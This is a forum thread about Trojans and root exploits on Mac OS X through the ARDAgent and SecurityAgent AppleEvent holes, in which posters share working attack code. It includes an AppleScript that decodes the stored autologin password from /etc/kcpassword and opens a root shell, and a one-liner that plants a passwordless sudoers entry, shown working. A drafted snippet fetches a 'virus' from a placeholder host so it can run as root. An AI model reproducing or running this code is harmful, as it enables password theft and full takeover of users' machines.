remote login Trojan, Trying to make a program that will select remote login. Options

[Nilkimas]

And before i forget, Congratulations Oktane and everybody on the code, great job!

[Skratz0r]

'sploit won't work on my comp. I suppose I shouldn't be so annoyed. :-P
But damm, I cant test it.

[Skratz0r]

Still having trouble getting it pinned down but I am able to reproduce it sporadically.

CODE

$ ps -axww | grep Security
5981  ??  S      0:01.27 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent -psn_0_102236161
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)

Then some combination of killing it, running it etc. and....

CODE

ps -axww | grep Security
6198  ??  S      0:01.59 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)

Hmm.

CODE

$ ps -auxww | grep Security
security  6198   0.7  0.4   144740   5896  ??  S     1:53AM   0:01.78 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent

Ok, so at some point it's being launched / relaunched as itself, not as the user... and it appears to not be launched with an argument of a specific psn.

I killed it, after the next two lines...

CODE

uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)

Well I can definitely get it to stop being uid=92 :) As for the getting it to be uid=92 that is proving somewhat more elusive.

Perhaps this might ease the testing...?

CODE

tell application "SecurityAgent"
    repeat while (text of (do shell script "whoami")) is not "root"
        
        try
            do shell script "killall SecurityAgent"
            return (text of (do shell script "whoami"))
        end try
        
    end repeat
end tell

Just a thought. :-|
Perhaps you could automate it trying to get itself to run as root.
I doubt mine is the best example there could have been, though.

~ Skrat

[callmenames]

I would like to say thank you to everyone who has participated. I've had so much fun this past few weeks and I'm grateful for the escape from the daily doldrums.

To the forum admins and staff for providing the place and setting the atmosphere. To lokin for starting this whole mess er thread. :) To Oktane both for ideas and for coding in differing directions (which I think is illustrative more than confusing, at least I hope) oh and for the beautiful authentication window replications. :), to Andrew for the courage to ask questions despite occasional teasing and for causing me to #comment / --explain so that anyone at any skill level (hopefully) had a shot at following along. To Wawl for prompt confirmation that the ARDAgent thing wasn't just a sleep-deprivation induced hallucination. :) To NullModem for clarifying /Library/Preferences/com.apple.SystemLoginItems, which has been so often overlooked (ahem.) To Siph0n, for watching over us all and for teaching me everything I know without requiring too many personal 'favors' in return (not that there's anything wrong with that sort of thing. Oh and for the Python and Perl!) :) To MacPunk for catching the SecurityAgent thing (and for reassuring me in #UGM, while the forum was being upgraded.) To Nilkimas for the Cocoa! AWESOME WORK DUDE! :)

And thanks in advance, to everyone who continues to question, to learn and especially to share.

I have re-learned, in the course of this thread, something which I repeatedly forget in life. Which is that while individually we are what we are... collectively, we are more than the sum of our parts.

At the start of this thread, my posts were frequently sarcastic, perhaps even mean. I apologize to anyone whom I may have offended and most especially if I in any way discouraged others from participating. Working with everyone who has been involved has been a pleasure. :)

Other than my own occasionally cranky responses, I have only one regret, which is that I failed to consider the individual people who would be tasked with getting the ARDAgent vulnerability fixed. Some of those people are extremely skilled open-source authors whose software I (and probably many of us here) use regularly. They deserved better from me and I apologize for shooting my mouth off without first remembering that Apple is people too and some of those people might not be so very different from many of us here. In the future, when I post about a vulnerability in Mac OS, everyone in this forum will be the 2nd to hear about it. I encourage you all to give those people, the Mac programmers within Apple, through official channels or otherwise... a bit of warning.

Okay, and an apology to Freaky - you deserve success. Just maybe less flame-bait in the next press release eh? :)

Oh and to the endless supply of utterly unqualified Internet journalists, thanks for all the terrific entertainment. Virtually all of you guys are easily duped, lazy / no fact-checking, FUD-spreading jackasses. If you aren't going to take the time and expend the effort to get the story right, please leave it for the real reporters who will. Thanks.

That said, for those interested in vulns, in the AppleEvents arena, ARDAgent is yet un-patched, SecurityAgent too, and I haven't experimented with it much. There's also a wowzer of a local DOS along similar lines which was pointed out to me by MacPunk (I think?) in the #UGM forum - its posted on the web somewhere. In other areas, /Library/Receipts is BEGGING to be exploited, which is old news as is SystemLoginItems and kickstart - all for admins which is still the default. And I'll reiterate... MOAB, setuid executables in /Applications/Utilities WRITABLE PATHS. All old news.

'callmenames' will be around for a bit longer and then will suddenly *poof* disappear. Rest assured that I'm never really gone. :)

Post some code! :)

[callmenames]

More stoopid-easy ARDAgent tricks... Local ARDAgent exploit to read the barely-encoded autologin password saved in /etc/kcpassword and then open a root shell in Terminal. You might also want to try that password on the autologin user's keychain too.

CODE

--This is AppleScript
global kcpassword
set kcpassword to ""

on get_autologin_password()
    try
        tell application "ARDAgent" to do shell script "declare -i offset=0 i=0;declare -a keys=(7d 89 52 23 d2 bc dd ea a3 b9 1f) hexbytes=($(hexdump -v -e '/1 \"%02X \"' /etc/kcpassword));for ((offset=0;offset<${#hexbytes[*]};offset++));do newbyte=$(printf '%02X' $((16#${keys[${i}]}^16#${hexbytes[$offset]})));[ \"${newbyte}\" == \"00\" ]&&echo&&break;echo -en \"\\x${newbyte}\";let i+=1;[ $i -gt 10 ]&&let i=0;done"
        set kcpassword to the result
    on error
        get_autologin_password()
    end try
end get_autologin_password

get_autologin_password()
tell application "Terminal" to do script "echo " & quoted form of kcpassword & " | /usr/bin/sudo -S id; exec /usr/bin/sudo /bin/bash -i"

Oh and incidentally, please steal this code! :) And anything else I've posted too, take it, use it, claim it, improve it, rewrite it, post it!

[Skratz0r]

... In other areas, /Library/Receipts is BEGGING to be exploited ...

How?

[callmenames]

When Disk Utility (GUI) or diskutil (command line) performs a repair permissions, it reads what the proper permissions should be from the receipts stored in /Library/Receipts. This has been posted in various place on the Interweb for years. This gentleman did a nice bit of work in the area recently: http://blogs.sun.com/jone/entry/apple_s_ardagent_suid_hole :)

[Skratz0r]

You could always do something of this elk...

CODE

-- Downloads an architecture specific virus
set arch to get text of (do shell script "uname -p")
do shell script "curl http://somehost.com/game-" & arch
-- Tell ARDagent to execute the virus game-<arch> as root here

The problem would be finding where to host it, though.

~ Skrat

This post has been edited by Skratz0r: Jun 25 2008, 08:56 AM

[callmenames]

As you may have read, this flaw is not capable of being exploited remotely

http://theappleblog.com/2008/06/24/unpatch...ommunity-fixes/

Izzat so?

CODE

$ ssh angel@localhost
Password:
Last login: Wed Jun 25 06:16:21 2008
Welcome to Darwin!
$ osacompile -e 'global my_username' -e 'set my_username to system attribute "USER"' -e 'on sudoers()' -e 'try' -e 'tell application "ARDAgent" to do shell script "echo \"" & my_username & (ASCII character 9) & "ALL=(ALL)" & (ASCII character 9) & "NOPASSWD: ALL\" >> /etc/sudoers"' -e 'on error' -e 'sudoers()' -e 'end try' -e 'end sudoers' -e 'sudoers()' -o for_remote_cli_sessions.app
$ open for_remote_cli_sessions.app/
$ sudo cat /etc/sudoers
# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the sudoers man page for the details on how to write a sudoers file.
#

# Host alias specification

# User alias specification

# Cmnd alias specification

# Defaults specification

# Runas alias specification

# User privilege specification
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL

# Uncomment to allow people in group wheel to run all commands
# %wheel        ALL=(ALL)       ALL

# Same thing without a password
# %wheel        ALL=(ALL)       NOPASSWD: ALL

# Samples
# %users  ALL=/sbin/mount /cdrom,/sbin/umount /cdrom
# %users  localhost=/sbin/shutdown -h now
angel   ALL=(ALL)       NOPASSWD: ALL
$

Yet another clueless Interweb news reporter.

[Skratz0r]

Not everyone has SSH access to the box they want to root, callmenames.
~_~